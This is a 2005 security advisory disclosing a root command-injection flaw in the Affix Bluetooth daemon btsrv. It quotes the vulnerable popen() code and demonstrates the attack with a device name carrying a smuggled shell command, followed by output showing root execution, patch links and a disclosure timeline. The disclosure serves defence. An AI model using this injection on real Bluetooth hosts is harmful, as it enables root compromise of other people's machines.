DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()' Author: Kevin Finisterre Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net Product: 'affix' References: http://www.digitalmunition.com/DMA[2005-0826a].txt Description: Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which provides kernel modules and 'affix' which provides control tools, libraries, and server daemons. Although Nokia believes that Affix is an useful piece of software, please bear in mind that it is not an official Nokia product, but a result of the research activity of Nokia Research Center. The following code snippet was found in affix-3.2.0/daemon/btsrv.c: int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum) { ... err = HCI_RemoteNameRequest(fd, &dev, name); if (err) { BTDEBUG("Name request failed: %s", hci_error(err)); ... sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda)); DBPRT("cmdline: [%s]", cmdline); fp = popen(cmdline, "r"); if (!fp) { BTERROR("popen() failed"); goto err; } err = fscanf(fp, "%s", pin); if (err == EOF) { BTERROR("fscanf() failed"); pclose(fp); goto err; } Exploitation of this bug is easier than the bluez variation of the same attack. When exploiting bluez, previous population of the bluetooth name cache is required. On Affix however the call to HCI_RemoteNameRequest() makes this an instant exploit regardless of the name cache. The btsrv daemon should obviously be started. root@animosity:~# btsrv btsrv: main: btsrv started [Affix 3.2.0]. btsdpd: main: btsdpd Affix 3.2.0 started. btsrv: start_service: Bound service Dialup Networking to port 1 btsrv: start_service: Bound service Dialup Networking Emulation to port 2 btsrv: start_service: Bound service Fax Service to port 3 btsrv: start_service: Bound service LAN Access to port 4 btsrv: start_service: Bound service OBEX File Transfer to port 5 btsrv: start_service: Bound service OBEX Object Push to port 6 As an example I will use my Ipaq 2215 to attack an Affix box. First I set the bluetooth name of my device to ";/usr/bin/id>/tmp/ooooo;" Next I start the attack by opening the bluetooth manager, clicking tools and going to Paired devices. Next I click Add, search for the target host and then double tap it. When prompted for a pin code I type in any random pin code and press enter. After a few moments I get an "Authentication failed!" message. On the screen where btsrv was started I see the following error which indicates an attack is in progress. Traceback (most recent call last): File "/etc/affix/btsrv-gui", line 106, in ? pin = t.go("Connection from %s [%s]" % (sys.argv[2], sys.argv[3])) IndexError: list index out of range sh: : command not found btsrv: event_pin_code_request: fscanf() failed Looking in /tmp on the target device shows successful exploitation. root@animosity:~# ls -al /tmp/ooooo -rw-r--r-- 1 root root 134 2005-08-26 16:47 /tmp/ooooo root@animosity:~# cat /tmp/ooooo uid=0(root) gid=0(root) groups=0(root) Feel free to get creatitve with this... http://www.digitalmunition.com/BluezHCIDpwned.txt Official patches for Affix can be found at http://affix.sourceforge.net http://affix.sourceforge.net/patch_btsrv_affix_3_2_0 http://affix.sourceforge.net/patch_btsrv_affix_2_1_2 Timeline: 08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed bad code again! 08/18/2005 *sigh* I guess I should tell Nokia about the bug now. 08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and fix it also asap". 08/26/2005 btsrv popen() call patch released Outtakes: "no, they copied from us.." - bluez "As far as I know, we didn't borrow code...So I guess they did then" - affix -KF